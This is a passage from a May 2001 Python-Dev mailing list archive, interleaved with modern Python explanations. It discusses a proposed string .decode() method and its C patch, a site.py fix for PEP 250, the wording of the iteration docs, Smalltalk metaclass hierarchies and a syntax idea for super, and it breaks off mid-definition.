> > We already have "data".encode(encoding) which encodes the string data
> > by passing it through the encoder of the given encoding.
> >
> > Wouldn't it be worthwhile to add direct access to codec decoders
> > through string methods as well ?
> >
> > (Note that this addition only makes sense for string objects,
> > since Unicode cannot be decoded.)
> >
> > Also, would there be any objections adding some more standard
> > codecs to the system ? I'm thinking of wrapping the binascii
> > module APIs in form of codecs...
> 
> Can you provide examples of where this can't be done using the
> existing approach?

There is no existing elegant approach except hooking up to the
codecs directly. Adding .decode() is really a matter of adding
symmetry.

Here are some examples of how these two codec methods could
be used:

	xmltext = binarydata.encode('base64')
	...
	binarydata = xmltext.decode('base64')

	zzz = data.encode('gzip')
	...
	data = zzz.decode('gzip')

	jpegimage = gifimage.decode('gif').encode('jpeg')

	mp3audio = wavaudio.decode('wav').encode('mp3')

	etc.

Basically all content transfer encodings can take advantage of
these two methods.

It's not really code bloat, BTW, since the C API is there;
the .decode() method would just expose it.
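For comparison, here is a sketch in present-day Python 3. In Python 3 this symmetry ended up in the module-level functions codecs.encode() and codecs.decode(). It did not become a general bytes.decode(), which accepts only text encodings. The standard registry has "base64" and "zlib" codecs. It has no "gzip", "gif", "jpeg", "wav" or "mp3" codec, so the sketch shows only the first two round trips from the list above, with "zlib" standing in for "gzip".

```python
import codecs

binarydata = b"\x00\x01 some binary payload \xfe\xff"

# Content transfer encoding: bytes -> base64 bytes -> original bytes.
xmltext = codecs.encode(binarydata, "base64")
restored = codecs.decode(xmltext, "base64")

# Compression through the "zlib" codec (stand-in for the hypothetical "gzip").
zzz = codecs.encode(binarydata, "zlib")
data = codecs.decode(zzz, "zlib")

print(codecs.encode(b"hello", "base64"))  # b'aGVsbG8=\n'
```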

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 21:38:10 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 14:38:10 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 20:32:46 +0200."
             <3AF052CE.E928BDA1@lemburg.com> 
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  
            <3AF052CE.E928BDA1@lemburg.com> 
Message-ID: <200105021938.OAA03550@cj20424-a.reston1.va.home.com>

> > Can you provide examples of where this can't be done using the
> > existing approach?
> 
> There is no existing elegant approach except hooking up to the
> codecs directly. Adding .decode() is really a matter of adding
> symmetry.

Yes, but symmetry is good except when it isn't. :-)

> Here are some examples of how these two codec methods could
> be used:
> 
> 	xmltext = binarydata.encode('base64')
> 	...
> 	binarydata = xmltext.decode('base64')
> 
> 	zzz = data.encode('gzip')
> 	...
> 	data = zzz.decode('gzip')
> 
> 	jpegimage = gifimage.decode('gif').encode('jpeg')
> 
> 	mp3audio = wavaudio.decode('wav').encode('mp3')
> 
> 	etc.

How would you do this currently?

> Basically all content transfer encodings can take advantage of
> these two methods.
> 
> It's not really code bloat, BTW, since the C API is there;
> the .decode() method would just expose it.

Show me the patch and I'll decide whether it's code bloat. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at effbot.org  Wed May  2 20:20:24 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 20:20:24 +0200
Subject: [Python-Dev] PEP 250 buglet
Message-ID: <004b01c0d334$8f600a50$e46940d5@hagrid>

PEP 250 suggests changing the sitedirs setup in site.py from

    sitedirs = [prefix]

to

    sitedirs == [makepath(prefix, "lib", "site-packages")]

on windows. it then goes on to say that

    This change does not preclude packages using the current
    location -- the change only adds a directory to sys.path, it
    does not remove anything.

this isn't true (even after correcting the typo), since the
sitedirs list isn't only added to the path; it's also used to
look for PTH files.  after this change, PTH files located under
prefix will no longer be found.

the following change works a bit better:

    sitedirs = [prefix, makepath(prefix, "lib", "site-packages")]
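A minimal sketch of why keeping prefix in the list matters. site.py looks for .pth files only in the listed directories, so dropping prefix hides any .pth file stored there. The helpers site_dirs() and find_pth_files() are hypothetical simplifications of the site.py logic, and os.path.join stands in for site.py's makepath.

```python
import glob
import os
import tempfile


def site_dirs(prefix, keep_prefix=True):
    """Hypothetical version of the Windows branch of site.py's sitedirs setup."""
    new_dir = os.path.join(prefix, "lib", "site-packages")
    return [prefix, new_dir] if keep_prefix else [new_dir]


def find_pth_files(dirs):
    """Return the basenames of the .pth files found in each directory, in order."""
    found = []
    for d in dirs:
        names = (os.path.basename(p) for p in glob.glob(os.path.join(d, "*.pth")))
        found.extend(sorted(names))
    return found


def demo():
    # Build a throwaway prefix with one .pth file in each location.
    with tempfile.TemporaryDirectory() as prefix:
        site_packages = os.path.join(prefix, "lib", "site-packages")
        os.makedirs(site_packages)
        open(os.path.join(prefix, "old.pth"), "w").close()
        open(os.path.join(site_packages, "new.pth"), "w").close()
        return (find_pth_files(site_dirs(prefix, keep_prefix=False)),
                find_pth_files(site_dirs(prefix)))
```

demo() returns (['new.pth'], ['old.pth', 'new.pth']). The PEP's list misses old.pth, and the suggested list finds both files.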

Cheers /F


From mal at lemburg.com  Wed May  2 21:55:25 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 21:55:25 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  
	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>
Message-ID: <3AF0662D.48671B4E@lemburg.com>

Guido van Rossum wrote:
> 
> > > Can you provide examples of where this can't be done using the
> > > existing approach?
> >
> > There is no existing elegant approach except hooking up to the
> > codecs directly. Adding .decode() is really a matter of adding
> > symmetry.
> 
> Yes, but symmetry is good except when it isn't. :-)
> 
> > Here are some examples of how these two codec methods could
> > be used:
> >
> >       xmltext = binarydata.encode('base64')
> >       ...
> >       binarydata = xmltext.decode('base64')
> >
> >       zzz = data.encode('gzip')
> >       ...
> >       data = zzz.decode('gzip')
> >
> >       jpegimage = gifimage.decode('gif').encode('jpeg')
> >
> >       mp3audio = wavaudio.decode('wav').encode('mp3')
> >
> >       etc.
> 
> How would you do this currently?

By looking up the codecs using the codec registry and
then calling them directly.
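A sketch of that registry route in present-day Python 3. codecs.lookup() returns a CodecInfo object. Its stateless encode and decode functions each return an (output, length consumed) pair. The wrapper names are hypothetical.

```python
import codecs


def encode_via_registry(data, encoding, errors="strict"):
    # Look the codec up, call its stateless encoder, drop the length consumed.
    output, _consumed = codecs.lookup(encoding).encode(data, errors)
    return output


def decode_via_registry(data, encoding, errors="strict"):
    output, _consumed = codecs.lookup(encoding).decode(data, errors)
    return output


xmltext = encode_via_registry(b"hello", "base64")    # b'aGVsbG8=\n'
binarydata = decode_via_registry(xmltext, "base64")  # b'hello'
text = decode_via_registry(b"caf\xe9", "latin-1")    # 'café'
```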
 
> > Basically all content transfer encodings can take advantage of
> > these two methods.
> >
> > It's not really code bloat, BTW, since the C API is there;
> > the .decode() method would just expose it.
> 
> Show me the patch and I'll decide whether it's code bloat. :-)

I've attached the patch. Due to a small reorganisation the
patch is a little longer -- symmetry has its price at C level
too ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/
-------------- next part --------------
--- CVS-Python/Include/stringobject.h	Sat Feb 24 10:30:49 2001
+++ Dev-Python/Include/stringobject.h	Wed May  2 21:05:12 2001
@@ -105,10 +105,19 @@ extern DL_IMPORT(PyObject*) PyString_AsE
     PyObject *str,	 	/* string object */
     const char *encoding,	/* encoding */
     const char *errors		/* error handling */
     );
 
+/* Decodes a string object and returns the result as Python string
+   object. */
+
+extern DL_IMPORT(PyObject*) PyString_AsDecodedString(
+    PyObject *str,	 	/* string object */
+    const char *encoding,	/* encoding */
+    const char *errors		/* error handling */
+    );
+
 /* Provides access to the internal data buffer and size of a string
    object or the default encoded version of an Unicode object. Passing
    NULL as *len parameter will force the string buffer to be
    0-terminated (passing a string with embedded NULL characters will
    cause an exception).  */
--- CVS-Python/Objects/stringobject.c	Wed May  2 16:19:22 2001
+++ Dev-Python/Objects/stringobject.c	Wed May  2 21:04:34 2001
@@ -138,42 +138,56 @@ PyString_FromString(const char *str)
 PyObject *PyString_Decode(const char *s,
 			  int size,
 			  const char *encoding,
 			  const char *errors)
 {
-    PyObject *buffer = NULL, *str;
+    PyObject *v, *str;
+
+    str = PyString_FromStringAndSize(s, size);
+    if (str == NULL)
+	return NULL;
+    v = PyString_AsDecodedString(str, encoding, errors);
+    Py_DECREF(str);
+    return v;
+}
+
+PyObject *PyString_AsDecodedString(PyObject *str,
+				   const char *encoding,
+				   const char *errors)
+{
+    PyObject *v;
+
+    if (!PyString_Check(str)) {
+        PyErr_BadArgument();
+        goto onError;
+    }
 
     if (encoding == NULL)
 	encoding = PyUnicode_GetDefaultEncoding();
 
     /* Decode via the codec registry */
-    buffer = PyBuffer_FromMemory((void *)s, size);
-    if (buffer == NULL)
-        goto onError;
-    str = PyCodec_Decode(buffer, encoding, errors);
-    if (str == NULL)
+    v = PyCodec_Decode(str, encoding, errors);
+    if (v == NULL)
         goto onError;
     /* Convert Unicode to a string using the default encoding */
-    if (PyUnicode_Check(str)) {
-	PyObject *temp = str;
-	str = PyUnicode_AsEncodedString(str, NULL, NULL);
+    if (PyUnicode_Check(v)) {
+	PyObject *temp = v;
+	v = PyUnicode_AsEncodedString(v, NULL, NULL);
 	Py_DECREF(temp);
-	if (str == NULL)
+	if (v == NULL)
 	    goto onError;
     }
-    if (!PyString_Check(str)) {
+    if (!PyString_Check(v)) {
         PyErr_Format(PyExc_TypeError,
                      "decoder did not return a string object (type=%.400s)",
-                     str->ob_type->tp_name);
-        Py_DECREF(str);
+                     v->ob_type->tp_name);
+        Py_DECREF(v);
         goto onError;
     }
-    Py_DECREF(buffer);
-    return str;
+    return v;
 
  onError:
-    Py_XDECREF(buffer);
     return NULL;
 }
 
 PyObject *PyString_Encode(const char *s,
 			  int size,
@@ -1773,10 +1780,29 @@ string_encode(PyStringObject *self, PyOb
         return NULL;
     return PyString_AsEncodedString((PyObject *)self, encoding, errors);
 }
 
 
+static char decode__doc__[] =
+"S.decode([encoding[,errors]]) -> string\n\
+\n\
+Return a decoded string version of S. Default encoding is the current\n\
+default string encoding. errors may be given to set a different error\n\
+handling scheme. Default is 'strict' meaning that decoding errors raise\n\
+a ValueError. Other possible values are 'ignore' and 'replace'.";
+
+static PyObject *
+string_decode(PyStringObject *self, PyObject *args)
+{
+    char *encoding = NULL;
+    char *errors = NULL;
+    if (!PyArg_ParseTuple(args, "|ss:decode", &encoding, &errors))
+        return NULL;
+    return PyString_AsDecodedString((PyObject *)self, encoding, errors);
+}
+
+
 static char expandtabs__doc__[] =
 "S.expandtabs([tabsize]) -> string\n\
 \n\
 Return a copy of S where all tab characters are expanded using spaces.\n\
 If tabsize is not given, a tab size of 8 characters is assumed.";
@@ -2347,10 +2373,11 @@ string_methods[] = {
 	{"title",       (PyCFunction)string_title,       1, title__doc__},
 	{"ljust",       (PyCFunction)string_ljust,       1, ljust__doc__},
 	{"rjust",       (PyCFunction)string_rjust,       1, rjust__doc__},
 	{"center",      (PyCFunction)string_center,      1, center__doc__},
 	{"encode",      (PyCFunction)string_encode,      1, encode__doc__},
+	{"decode",      (PyCFunction)string_decode,      1, decode__doc__},
 	{"expandtabs",  (PyCFunction)string_expandtabs,  1, expandtabs__doc__},
 	{"splitlines",  (PyCFunction)string_splitlines,  1, splitlines__doc__},
 #if 0
 	{"zfill",       (PyCFunction)string_zfill,       1, zfill__doc__},
 #endif
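The control flow of the new PyString_AsDecodedString() can be paraphrased in Python 3 terms, with bytes for the 2.1 string type and str for Unicode. This is a sketch, not the patch itself. DEFAULT_ENCODING stands in for PyUnicode_GetDefaultEncoding() and is assumed here to be ASCII, as in Python 2.1. The function name as_decoded_string is hypothetical.

```python
import codecs

# Assumption: stands in for PyUnicode_GetDefaultEncoding() (ASCII in Python 2.1).
DEFAULT_ENCODING = "ascii"


def as_decoded_string(data, encoding=None, errors="strict"):
    """Python paraphrase of the C function PyString_AsDecodedString()."""
    if not isinstance(data, bytes):            # PyString_Check / PyErr_BadArgument
        raise TypeError("bad argument type for built-in operation")
    if encoding is None:
        encoding = DEFAULT_ENCODING
    v = codecs.decode(data, encoding, errors)  # PyCodec_Decode
    if isinstance(v, str):                     # Unicode result: re-encode with the default
        v = v.encode(DEFAULT_ENCODING)
    if not isinstance(v, bytes):
        raise TypeError("decoder did not return a string object (type=%.400s)"
                        % type(v).__name__)
    return v
```

With ASCII as the default, as_decoded_string(b"caf\xe9", "latin-1") raises UnicodeEncodeError. That error corresponds to the failure PyUnicode_AsEncodedString() would report in the C version.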

From mal at lemburg.com  Wed May  2 22:36:30 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 22:36:30 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  
		            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com>
Message-ID: <3AF06FCE.854D4DF7@lemburg.com>

Here's a little fun codec to play with. It encodes the input
using the ROT13 encoding (which is 1-1 and idempotent). The
main difference over the existing codecs is that it returns
a string rather than Unicode.

To install it, simply place it in some directory on your Python 
path.

Here's some sample output (Netscape can unscramble this BTW):

"""
Urer'f n yvggyr sha pbqrp gb cynl jvgu. Vg rapbqrf gur vachg
hfvat gur EBG13 rapbqvat (juvpu vf 1-1 naq vqrzcbgrag). Gur
znva qvssrerapr bire gur rkvfgvat pbqrpf vf gung vg ergheaf
n fgevat engure guna Havpbqr.

Gb vafgnyy vg, fvzcyl cynpr vg va fbzr qverpgbel ba lbhe Clguba 
cngu.
"""

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/
-------------- next part --------------
A non-text attachment was scrubbed...
Name: rot_13.py
Type: text/python
Size: 2066 bytes
Desc: not available
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010502/9cbfa6dd/attachment-0001.bin>

From guido at digicool.com  Thu May  3 00:11:07 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 17:11:07 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 13:12:21 +0200."
             <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> 
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>  
            <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> 
Message-ID: <200105022211.RAA05242@cj20424-a.reston1.va.home.com>

> [From Jim Althoff]
> > In the list below, indentation indicates class hierarchy (superclass --
> > subclass)
> The indentation, unfortunately, seems to be destroyed.
[...]
> A question for Jim (this is more Smalltalk than Python related):
> How does the Behaviour class fit into this picture?

Jim responded with a much clearer diagram, and as a bonus an answer to
your question about Behaviour!

> Hi Guido,
> 
> Sorry about the mangled diagram.  It's kind of tricky doing this with just
> text.  :-)    Anyway, below is a -- hopefully -- improved diagram and
> description.
> 
> At the very bottom is an answer to the question about "Behavior".
> 
> Jim
> 
> ==========================================
> 
> Smalltalk-80 (simplified) class/metaclass structure:
> 
> Terminology:
> o A "class" is an object that can be instantiated.
> o A "metaclass" is a class and is one such that when _it_ is instantiated
> _that_ instance is _itself_ a class (which can be instantiated).
> (A metaclass is a specialization of class).
> 
> Essentially,  there are two parallel hierarchies: 1) the class hierarchy
> and 2) the metaclass hierarchy.  The class hierarchy starts with class
> Object.  The metaclass hierarchy starts right below Class with the
> metaclass ObjectMetaClass.
> 
> <none>
> o Object
>     o Class
>         o MetaClass
>         o ObjectMetaClass
>             o ClassMetaClass
>                 o MetaClassMetaClass
> 
> Object is the top of the class hierarchy (and total hierarchy).  It has no
> superclass.  It is the only class that has no superclass.
> Class is a subclass of Object.
> MetaClass is a subclass of Class.
> 
> ObjectMetaClass is also a subclass of Class.
> ClassMetaClass is a subclass of ObjectMetaClass.
> MetaClassMetaClass is a subclass of ClassMetaClass.
> 
> Adding in application classes Rectangle and SpamRectangle then might look
> like:
> 
> <none>
> o Object
>     o Class
>         o MetaClass
>         o ObjectMetaClass
>             o ClassMetaClass
>                 o MetaClassMetaClass
>             o RectangleMetaClass
>                 o SpamRectangleMetaClass
>     o Rectangle
>         o SpamRectangle
> 
> Rectangle is a subclass of Object.
> SpamRectangle is a subclass of Rectangle.
> 
> RectangleMetaClass is a subclass of ObjectMetaClass.
> SpamRectangleMetaClass is a subclass of RectangleMetaClass.
> 
> Rectangle is an instance of RectangleMetaClass.
> SpamRectangle is an instance of SpamRectangleMetaClass.
> (SpamRectangleMetaClass is an instance of MetaClass.)
> 
> The next list shows both the subclass- and the instanceOf- relationships
> between classes and metaclasses.
> 
> In this list a class listed below another class is a subclass of it.
> SpamMC is an abbreviation for SpamMetaClass (the metaclass of class Spam --
> the class of which class Spam is an instance).
> 
> <none>                Class
> Object    instanceOf  ObjectMC    instanceOf  MetaClass
> Class     instanceOf  ClassMC     instanceOf  MetaClass
> MetaClass instanceOf  MetaClassMC instanceOf  MetaClass
> 
> ObjectMetaClass, ClassMetaClass, and MetaClassMetaClass are all instances
> of MetaClass.
> 
> MetaClass is an instance of MetaClassMetaClass.  But MetaClassMetaClass is
> an instance of MetaClass.  So this particular relationship is circular.
> (In Smalltalk-76, Class was an instance of itself.)
> 
> Application classes would have a similar, parallel hierarchy between
> classes and their associated metaclasses.  For example:
> 
> Object        instanceOf ObjectMC        instanceOf MetaClass
> Rectangle     instanceOf RectangleMC     instanceOf MetaClass
> SpamRectangle instanceOf SpamRectangleMC instanceOf MetaClass
> 
> When you create class SpamRectangle as a subclass of class Rectangle, the
> code in the class-creation method first creates the metaclass
> SpamRectangleMetaClass -- by instantiating MetaClass -- as a subclass of
> RectangleMetaClass.  The code then creates the SpamRectangle class as an
> instance of the SpamRectangleMetaClass metaclass it just created.
> 
> You can then create instances of class SpamRectangle.
> 
> SpamRectangle "instance methods" reside in the method dict of
> SpamRectangle.
> SpamRectangle "class methods" reside in the method dict of
> SpamRectangleMetaClass.
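A rough Python 3 analogy of the class-creation steps just described. It assumes that Python's built-in type plays the role of MetaClass. In Python, object's metaclass is type itself, so there is no separate ObjectMetaClass. The helper make_subclass() is hypothetical. It first creates the metaclass as a subclass of the base class's metaclass, then creates the class as an instance of that new metaclass, so "class methods" live in the metaclass's dict.

```python
def make_subclass(name, base, instance_methods=None, class_methods=None):
    """Hypothetical helper mirroring the Smalltalk-80 steps described above."""
    base_meta = type(base)
    # Step 1: instantiate the meta-metaclass (normally `type`, our "MetaClass")
    # to create <name>MetaClass as a subclass of the base's metaclass.
    meta = type(base_meta)(name + "MetaClass", (base_meta,), dict(class_methods or {}))
    # Step 2: create the class itself as an instance of the new metaclass.
    return meta(name, (base,), dict(instance_methods or {}))


def _init(self, width, height):
    self.width, self.height = width, height


def _area(self):
    return self.width * self.height


def _unit(cls):
    # A "class method": it lives in the metaclass, so `cls` is the class object.
    return cls(1, 1)


Rectangle = make_subclass("Rectangle", object,
                          {"__init__": _init, "area": _area},
                          {"unit": _unit})
SpamRectangle = make_subclass("SpamRectangle", Rectangle)
```

Here type(type) is type, which mirrors the circular MetaClass / MetaClassMetaClass knot. Python's classmethod is visible from instances, but unit is not: SpamRectangle(2, 3).unit raises AttributeError. This matches the Smalltalk arrangement, where class methods sit in the metaclass.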
> 
> ============================
> 
> Regarding Thomas' question:
> 
> The Smalltalk-80 class hierarchy actually has a bit more factoring than
> what I show above.  In particular, Class and MetaClass are subclasses of
> the class ClassDescription.  ClassDescription is a subclass of class
> Behavior.  Behavior is a subclass of Object.
> 
> So it looks like:
> 
> <none>
> o Object
>     o Behavior
>         o ClassDescription
>             o MetaClass
>             o Class
>                 o ObjectMetaClass
>                     o BehaviorMetaClass
>                         o ClassDescriptionMetaClass
>                             o MetaClassMetaClass
>                             o ClassMetaClass
> 
> Class Behavior basically abstracts the creation and handling of method
> dicts.  Class ClassDescription factors out common, reusable code between
> MetaClass and Class.  Clearly there are a number of ways of designing (or
> over-designing <wink> ) this part of the hierarchy.  The key idea, though,
> was to use the subclassing mechanism as a way of supporting specialized
> class methods.
> 
> =============================

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Wed May  2 23:24:28 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 2 May 2001 17:24:28 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/lib libfuncs.tex,1.76,1.77
In-Reply-To: <E14v35l-0007pQ-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOKJPAA.tim.one@home.com>

[Fred L. Drake]
> Update the filter() and list() descriptions to include information
> about the support for containers and iteration.
> ...
>   \begin{funcdesc}{list}{sequence}
> !   Return a list whose items are the same and in the same order as
> !   \var{sequence}'s items.  \var{sequence} may be either a sequence,
> !   a container that supports iteration, or an iterator object.
> ...

[and similarly for filter()]

Before we repeat this last incantation umpteen more times in the docs, is
this how we want it to read in the end?  The truth of the implementation and
of the design is that "sequence" is any object that supports iteration,
period (if PyObject_GetIter(op) succeeds, list(op) etc are happy, else they
raise TypeError).  "A sequence" and "an iterator object" *always* support
iteration, so naming them too appears to draw a distinction that doesn't
exist.

Suggested alternative:

    \var{sequence} must support iteration (see XXX).

where XXX is common boilerplate explaining what "support iteration" means,
and that sequences and iterator objects are just particular cases of that.
Note that this boilerplate may expand to include generators too before 2.2 is
real, and a generator isn't really "a container that supports iteration" (the
word "container" is a strain in the generator context).  That is, a
long-winded incantation is just going to get longer over time, and if it's
repeated umpteen places in the docs I doubt they'll all get updated when
needed.
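A small illustration of Tim's point in present-day Python. list() and filter() accept anything for which iter() succeeds, and iter() is the Python-level face of PyObject_GetIter. That covers a classic sequence, a mapping, an iterator and a generator alike. The class and function names below are made up for the example.

```python
class OldStyleSequence:
    """Iterable only through the __getitem__/IndexError sequence protocol."""

    def __getitem__(self, index):
        if index >= 3:
            raise IndexError(index)
        return index * 10


def countdown(n):
    # A generator: iterable, but hardly "a container".
    while n > 0:
        yield n
        n -= 1


def supports_iteration(obj):
    """True if iter(obj) succeeds, which is all list() and filter() need."""
    try:
        iter(obj)
    except TypeError:
        return False
    return True
```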


From michel at digicool.com  Wed May  2 23:43:42 2001
From: michel at digicool.com (Michel Pelletier)
Date: Wed, 2 May 2001 14:43:42 -0700 (PDT)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105022211.RAA05242@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.LNX.4.32.0105021441060.780-100000@localhost.localdomain>


On Wed, 2 May 2001, Guido van Rossum wrote:

> > <none>
> > o Object
> >     o Class
> >         o MetaClass
> >         o ObjectMetaClass
> >             o ClassMetaClass
> >                 o MetaClassMetaClass
> >
> > Object is the top of the class hierarchy (and total hierarchy).  It has no
> > superclass.  It is the only class that has no superclass.
> > Class is a subclass of Object.
> > MetaClass is a subclass of Class.
> >
> > ObjectMetaClass is also a subclass of Class.
> > ClassMetaClass is a subclass of ObjectMetaClass.
> > MetaClassMetaClass is a subclass of ClassMetaClass.

Does this go on ad infinitum?  ie, is there a ClassMetaClassMetaClass
which subclasses MetaClassMetaClass and so on?  I was under the impression
from talking to JimF that Smalltalk eventually stopped at a class
that is a subclass of itself.

-Michel


From greg at cosc.canterbury.ac.nz  Thu May  3 03:35:29 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 13:35:29 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AEFCEBD.2E5979C9@lemburg.com>
Message-ID: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> I'm not sure I can follow you here: DictType.__repr__ is the
> representation method of the dictionary and not inherited
> from TypeType, so there should be no problem.

The problem is that DictType.__repr__ could mean either
the unbound method for finding the repr of a dictionary,
or the bound method for finding the repr of DictType
itself.

This ambiguity is inherent in the Python language as soon
as you try to make classes into instances (which you have
to do as a consequence of making types into classes).
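Present-day Python resolves this ambiguity by looking up special methods on the type. The attribute dict.__repr__ is dict's own entry, the method for repr-ing dictionaries. The built-in repr(dict) instead goes through type(dict).__repr__. A short check in Python 3:

```python
instance_method = dict.__repr__              # attribute lookup finds dict's own __repr__
instance_repr = instance_method({"a": 1})    # the repr of a dictionary
class_repr = repr(dict)                      # repr() looks __repr__ up on type(dict)
via_metaclass = type(dict).__repr__(dict)    # the same lookup, spelled out
```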

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May  3 05:15:41 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:15:41 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <Pine.LNX.4.32.0105021441060.780-100000@localhost.localdomain>
Message-ID: <200105030315.PAA16465@s454.cosc.canterbury.ac.nz>

Michel Pelletier <michel at digicool.com>:

> I was under the impression
> from talking to JimF that Smalltalk eventually stopped at a class
> that is a subclass of itself.

Some years ago, while playing with Sun's Postscript-based
NeWS window system, I devised an OO language (called P) that 
got translated into PostScript. It had a very Smalltalk-like
class/metaclass system, although rather simpler than what
JimF described. As I remember, the kernel consisted
of a little knot of about 6 classes with some interesting
incestuous relationships between them.

If anyone's interested, I could dig out the code and
provide details of how it all worked. There might be some
ideas that could be used in Python.

(Programming in P felt a lot like programming in Python,
by the way. If my name had been Guido, who knows where it
might have led!)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May  3 05:25:12 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:25:12 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AEFF710.9471.8025D7EA@localhost>
Message-ID: <200105030325.PAA16469@s454.cosc.canterbury.ac.nz>

Gordon McMillan <gmcm at hypernet.com>:

> I would like to see ... some discussion of the expected 
> pragmatic benefits. (That's a different topic from subclassing 
> types.)

Actually, it's not -- the two issues are connected.

Suppose we succeed in unifying types and classes. Then
instead of classes being of type ClassType, they are
now instances of ClassClass. So classes are also
instances, or in other words, we have unified classes
and instances.

So even if we don't go as far as adding Smalltalk-style
class-methods-via-metaclasses, we still have to deal
with the fact that some things will be both classes
and instances.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May  3 05:27:34 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:27:34 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>
Message-ID: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz>

Guido:

> Actually, I think that what's in the __dict__ is just perfect

I was thinking of backwards compatibility for people who
are hacking the __dict__ of a class directly.

If you don't care about that, the problem is simpler.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May  3 05:39:08 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:39:08 +1200 (NZST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <200105021511.KAA32271@cj20424-a.reston1.va.home.com>
Message-ID: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz>

Guido:

> Will we need to add a "::" operator to Python???

If so, I hope we can find a syntax that doesn't remind
one of C++ so much...

I have an idea! 

How about spelling super(self, MyBaseClass) as

   MyBaseClass[self]

This can be thought of as a sort of "cast" which turns self
into an object which behaves like it were an instance of
MyBaseClass. Then we can write

   MyBaseClass[self].foo(args)

Advantages:
* Concise and uncluttered
* No new syntax needed
* Can be implemented using existing mechanisms
* Doesn't even remotely resemble anything in C++ :-)
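A sketch of how the proposed MyBaseClass[self] spelling could be built from existing mechanisms in present-day Python 3. A metaclass __getitem__ returns a proxy, and the proxy looks attributes up starting at the given class and binds them to the instance. CastMeta and _Cast are hypothetical names. The approach requires a metaclass on the base class. Python 2.2 eventually added the built-in super(type, obj) instead.

```python
class _Cast:
    """Proxy that resolves attributes starting at `cls` and binds them to `obj`."""

    def __init__(self, cls, obj):
        self._cls = cls
        self._obj = obj

    def __getattr__(self, name):
        # Only called for names not found on the proxy itself.
        for klass in self._cls.__mro__:
            if name in vars(klass):
                attr = vars(klass)[name]
                if hasattr(attr, "__get__"):
                    return attr.__get__(self._obj, self._cls)
                return attr
        raise AttributeError(name)


class CastMeta(type):
    def __getitem__(cls, obj):
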